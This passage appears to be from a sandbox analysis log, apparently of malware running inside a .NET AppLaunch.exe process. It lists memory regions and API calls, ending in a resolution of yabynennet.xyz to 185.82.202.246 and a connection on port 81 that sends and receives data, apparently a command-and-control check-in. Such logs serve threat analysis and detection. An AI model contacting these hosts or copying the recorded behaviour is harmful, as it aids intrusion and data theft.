1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2965 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2969 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2982 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2983 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2988 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2996 start_va = 0x6bed0000 end_va = 0x6bfa7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Security\\93d03eb9812405fa70e89d4efd5f7e14\\System.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.security\\93d03eb9812405fa70e89d4efd5f7e14\\system.security.ni.dll") Region: id = 3008 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3021 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3022 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3023 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3527 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3530 start_va = 0x4e0000 end_va = 0x4e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 3531 start_va = 0x5b90000 end_va = 0x5c35fff monitored = 0 entry_point = 0x5b91c9a region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 3532 start_va = 0x4e0000 end_va = 0x4e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 3533 start_va = 0x5b90000 end_va = 0x5c35fff monitored = 0 entry_point = 0x5b91c9a region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 3534 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3535 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3538 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3539 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4292 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4296 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4300 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4301 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 4302 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4304 start_va = 0x4e0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 4313 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4314 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4315 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4316 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4318 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4319 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4322 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 4324 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4325 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4326 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4328 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4329 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4331 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4332 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4347 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4348 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4349 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4350 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4351 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4353 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4355 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4356 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4357 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4360 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4363 start_va = 0x5850000 end_va = 0x588ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005850000" filename = "" Region: id = 4364 start_va = 0x5be0000 end_va = 0x5c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005be0000" filename = "" Region: id = 4365 start_va = 0xfff2e000 end_va = 0xfff30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff2e000" filename = "" Thread: id = 92 os_tid = 0xf20 [0167.239] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0171.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x38e970 | out: phkResult=0x38e970*=0x0) returned 0x2 [0171.862] RegCloseKey (hKey=0x80000002) returned 0x0 [0173.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", nBufferLength=0x105, lpBuffer=0x38e3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", lpFilePart=0x0) returned 0x42 [0173.426] GetCurrentProcess () returned 0xffffffff [0173.427] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38e700 | out: TokenHandle=0x38e700*=0x40) returned 1 [0173.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x38e1b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0173.484] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x38e6f8 | out: lpFileInformation=0x38e6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0173.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x38e184, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0173.511] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x38e700 | out: lpFileInformation=0x38e700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0173.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x38e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0173.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38e638) returned 1 [0173.515] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1e8 [0173.516] GetFileType (hFile=0x1e8) returned 0x1 [0173.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38e634) returned 1 [0173.516] GetFileType (hFile=0x1e8) returned 0x1 [0173.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x38d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0173.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x38d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0173.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38dc14) returned 1 [0173.701] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x38ded8 | out: lpFileInformation=0x38ded8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0173.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38dc10) returned 1 [0173.971] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x38dda4 | out: pfEnabled=0x38dda4) returned 0x0 [0173.999] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x38e6f4 | out: lpFileSizeHigh=0x38e6f4*=0x0) returned 0x8c8e [0174.000] ReadFile (in: hFile=0x1e8, lpBuffer=0x251be6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e6b0, lpOverlapped=0x0 | out: lpBuffer=0x251be6c*, lpNumberOfBytesRead=0x38e6b0*=0x1000, lpOverlapped=0x0) returned 1 [0174.024] ReadFile (in: hFile=0x1e8, lpBuffer=0x251be6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e560, lpOverlapped=0x0 | out: lpBuffer=0x251be6c*, lpNumberOfBytesRead=0x38e560*=0x1000, lpOverlapped=0x0) returned 1 [0174.026] ReadFile (in: hFile=0x1e8, lpBuffer=0x251be6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e414, lpOverlapped=0x0 | out: lpBuffer=0x251be6c*, lpNumberOfBytesRead=0x38e414*=0x1000, lpOverlapped=0x0) returned 1 [0174.027] ReadFile (in: hFile=0x1e8, lpBuffer=0x251be6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e414, lpOverlapped=0x0 | out: lpBuffer=0x251be6c*, lpNumberOfBytesRead=0x38e414*=0x1000, lpOverlapped=0x0) returned 1 [0174.028] ReadFile (in: hFile=0x1e8, lpBuffer=0x251be6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e414, lpOverlapped=0x0 | out: lpBuffer=0x251be6c*, lpNumberOfBytesRead=0x38e414*=0x1000, lpOverlapped=0x0) returned 1 [0174.029] ReadFile (in: hFile=0x1e8, lpBuffer=0x251be6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e34c, lpOverlapped=0x0 | out: lpBuffer=0x251be6c*, lpNumberOfBytesRead=0x38e34c*=0x1000, lpOverlapped=0x0) returned 1 [0174.035] ReadFile (in: hFile=0x1e8, lpBuffer=0x251be6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e4b8, lpOverlapped=0x0 | out: lpBuffer=0x251be6c*, lpNumberOfBytesRead=0x38e4b8*=0x1000, lpOverlapped=0x0) returned 1 [0174.038] ReadFile (in: hFile=0x1e8, lpBuffer=0x251be6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e3ac, lpOverlapped=0x0 | out: lpBuffer=0x251be6c*, lpNumberOfBytesRead=0x38e3ac*=0x1000, lpOverlapped=0x0) returned 1 [0174.038] ReadFile (in: hFile=0x1e8, lpBuffer=0x251be6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e3ac, lpOverlapped=0x0 | out: lpBuffer=0x251be6c*, lpNumberOfBytesRead=0x38e3ac*=0xc8e, lpOverlapped=0x0) returned 1 [0174.039] ReadFile (in: hFile=0x1e8, lpBuffer=0x251be6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e470, lpOverlapped=0x0 | out: lpBuffer=0x251be6c*, lpNumberOfBytesRead=0x38e470*=0x0, lpOverlapped=0x0) returned 1 [0174.039] CloseHandle (hObject=0x1e8) returned 1 [0174.039] CloseHandle (hObject=0x40) returned 1 [0174.041] GetCurrentProcess () returned 0xffffffff [0174.041] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38e84c | out: TokenHandle=0x38e84c*=0x40) returned 1 [0174.042] CloseHandle (hObject=0x40) returned 1 [0174.042] GetCurrentProcess () returned 0xffffffff [0174.042] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38e84c | out: TokenHandle=0x38e84c*=0x40) returned 1 [0174.043] CloseHandle (hObject=0x40) returned 1 [0174.044] GetCurrentProcess () returned 0xffffffff [0174.045] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38e700 | out: TokenHandle=0x38e700*=0x40) returned 1 [0174.092] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x38e6f8 | out: lpFileInformation=0x38e6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc39c5900, ftCreationTime.dwHighDateTime=0x1cac64f, ftLastAccessTime.dwLowDateTime=0xf6bca250, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0xc39c5900, ftLastWriteTime.dwHighDateTime=0x1cac64f, nFileSizeHigh=0x0, nFileSizeLow=0x119)) returned 1 [0174.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", nBufferLength=0x105, lpBuffer=0x38e184, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", lpFilePart=0x0) returned 0x42 [0174.093] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x38e700 | out: lpFileInformation=0x38e700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc39c5900, ftCreationTime.dwHighDateTime=0x1cac64f, ftLastAccessTime.dwLowDateTime=0xf6bca250, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0xc39c5900, ftLastWriteTime.dwHighDateTime=0x1cac64f, nFileSizeHigh=0x0, nFileSizeLow=0x119)) returned 1 [0174.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", nBufferLength=0x105, lpBuffer=0x38e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", lpFilePart=0x0) returned 0x42 [0174.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38e638) returned 1 [0174.094] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1e8 [0174.094] GetFileType (hFile=0x1e8) returned 0x1 [0174.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38e634) returned 1 [0174.094] GetFileType (hFile=0x1e8) returned 0x1 [0174.094] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x38e6f4 | out: lpFileSizeHigh=0x38e6f4*=0x0) returned 0x119 [0174.094] ReadFile (in: hFile=0x1e8, lpBuffer=0x2534638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e6b0, lpOverlapped=0x0 | out: lpBuffer=0x2534638*, lpNumberOfBytesRead=0x38e6b0*=0x119, lpOverlapped=0x0) returned 1 [0174.120] ReadFile (in: hFile=0x1e8, lpBuffer=0x2534638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e574, lpOverlapped=0x0 | out: lpBuffer=0x2534638*, lpNumberOfBytesRead=0x38e574*=0x0, lpOverlapped=0x0) returned 1 [0174.120] CloseHandle (hObject=0x1e8) returned 1 [0174.120] CloseHandle (hObject=0x40) returned 1 [0174.120] GetCurrentProcess () returned 0xffffffff [0174.121] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38e84c | out: TokenHandle=0x38e84c*=0x40) returned 1 [0174.122] CloseHandle (hObject=0x40) returned 1 [0174.123] GetCurrentProcess () returned 0xffffffff [0174.123] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38e84c | out: TokenHandle=0x38e84c*=0x40) returned 1 [0174.124] CloseHandle (hObject=0x40) returned 1 [0174.157] GetCurrentProcess () returned 0xffffffff [0174.157] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38e664 | out: TokenHandle=0x38e664*=0x40) returned 1 [0174.169] CloseHandle (hObject=0x40) returned 1 [0174.169] GetCurrentProcess () returned 0xffffffff [0174.170] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38e67c | out: TokenHandle=0x38e67c*=0x40) returned 1 [0174.171] CloseHandle (hObject=0x40) returned 1 [0174.220] GetCurrentProcess () returned 0xffffffff [0174.220] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38de80 | out: TokenHandle=0x38de80*=0x40) returned 1 [0174.319] CloseHandle (hObject=0x40) returned 1 [0174.320] GetCurrentProcess () returned 0xffffffff [0174.320] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38de98 | out: TokenHandle=0x38de98*=0x40) returned 1 [0174.320] CloseHandle (hObject=0x40) returned 1 [0174.644] GetCurrentProcess () returned 0xffffffff [0174.644] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed74 | out: TokenHandle=0x38ed74*=0x40) returned 1 [0174.676] CloseHandle (hObject=0x40) returned 1 [0174.677] GetCurrentProcess () returned 0xffffffff [0174.677] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed8c | out: TokenHandle=0x38ed8c*=0x40) returned 1 [0174.678] CloseHandle (hObject=0x40) returned 1 [0175.086] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x38e604 | out: phkResult=0x38e604*=0x0) returned 0x2 [0175.086] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x38e604 | out: phkResult=0x38e604*=0x0) returned 0x2 [0175.874] EtwEventRegister () returned 0x0 [0176.012] GetCurrentProcess () returned 0xffffffff [0176.012] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed8c | out: TokenHandle=0x38ed8c*=0x1e8) returned 1 [0176.013] CloseHandle (hObject=0x1e8) returned 1 [0176.013] GetCurrentProcess () returned 0xffffffff [0176.013] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38eda4 | out: TokenHandle=0x38eda4*=0x1e8) returned 1 [0176.015] CloseHandle (hObject=0x1e8) returned 1 [0176.092] EtwEventRegister () returned 0x0 [0176.139] EtwEventRegister () returned 0x0 [0176.197] CoCreateGuid (in: pguid=0x38ee58 | out: pguid=0x38ee58*(Data1=0xdce95408, Data2=0xfdec, Data3=0x43d5, Data4=([0]=0x9e, [1]=0x54, [2]=0x1f, [3]=0x6e, [4]=0x69, [5]=0x32, [6]=0x72, [7]=0xde))) returned 0x0 [0176.202] CoCreateGuid (in: pguid=0x38ed9c | out: pguid=0x38ed9c*(Data1=0xa0879ecb, Data2=0x6f7e, Data3=0x4ba0, Data4=([0]=0xa2, [1]=0x2c, [2]=0x68, [3]=0xa2, [4]=0x6f, [5]=0x44, [6]=0x81, [7]=0x7c))) returned 0x0 [0176.223] CoCreateGuid (in: pguid=0x38ec34 | out: pguid=0x38ec34*(Data1=0x496ca9f9, Data2=0xaaa2, Data3=0x48f4, Data4=([0]=0xb8, [1]=0x2f, [2]=0xfa, [3]=0x93, [4]=0x8f, [5]=0x60, [6]=0xa, [7]=0xea))) returned 0x0 [0176.339] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x38e8b8 | out: lpWSAData=0x38e8b8) returned 0 [0176.351] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x23c [0176.689] setsockopt (s=0x23c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0176.689] closesocket (s=0x23c) returned 0 [0176.689] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x23c [0176.762] setsockopt (s=0x23c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0176.762] closesocket (s=0x23c) returned 0 [0176.773] GetCurrentProcess () returned 0xffffffff [0176.773] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38e6b8 | out: TokenHandle=0x38e6b8*=0x23c) returned 1 [0176.781] CloseHandle (hObject=0x23c) returned 1 [0176.781] GetCurrentProcess () returned 0xffffffff [0176.781] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38e6d0 | out: TokenHandle=0x38e6d0*=0x23c) returned 1 [0176.782] CloseHandle (hObject=0x23c) returned 1 [0176.826] GetAddrInfoW (in: pNodeName="yabynennet.xyz", pServiceName=0x0, pHints=0x38eaa0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x38ea48 | out: ppResult=0x38ea48*=0x71ea68*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="yabynennet.xyz", ai_addr=0x72be18*(sa_family=2, sin_port=0x0, sin_addr="185.82.202.246"), ai_next=0x0)) returned 0 [0177.794] FreeAddrInfoW (pAddrInfo=0x71ea68*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="yabynennet.xyz", ai_addr=0x72be18*(sa_family=2, sin_port=0x0, sin_addr="185.82.202.246"), ai_next=0x0)) [0177.796] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x268 [0177.802] WSAConnect (in: s=0x268, name=0x25bbc8c*(sa_family=2, sin_port=0x51, sin_addr="185.82.202.246"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0177.825] setsockopt (s=0x268, level=65535, optname=4098, optval="", optlen=4) returned 0 [0177.825] setsockopt (s=0x268, level=65535, optname=4097, optval="", optlen=4) returned 0 [0177.827] setsockopt (s=0x268, level=6, optname=1, optval="\x01", optlen=4) returned 0 [0177.827] setsockopt (s=0x268, level=65535, optname=4101, optval="\x0eu\x1b", optlen=4) returned 0 [0177.827] send (s=0x268, buf=0x25ae9b0*, len=38, flags=0) returned 38 [0177.829] setsockopt (s=0x268, level=65535, optname=4102, optval="\x0eu\x1b", optlen=4) returned 0 [0177.829] recv (in: s=0x268, buf=0x25dc188, len=1, flags=0 | out: buf=0x25dc188*) returned 1 [0177.878] send (s=0x268, buf=0x25dcb27*, len=203, flags=0) returned 203 [0177.879] recv (in: s=0x268, buf=0x25de0bc, len=8192, flags=0 | out: buf=0x25de0bc*) returned 142 [0184.146] CoCreateGuid (in: pguid=0x38ee54 | out: 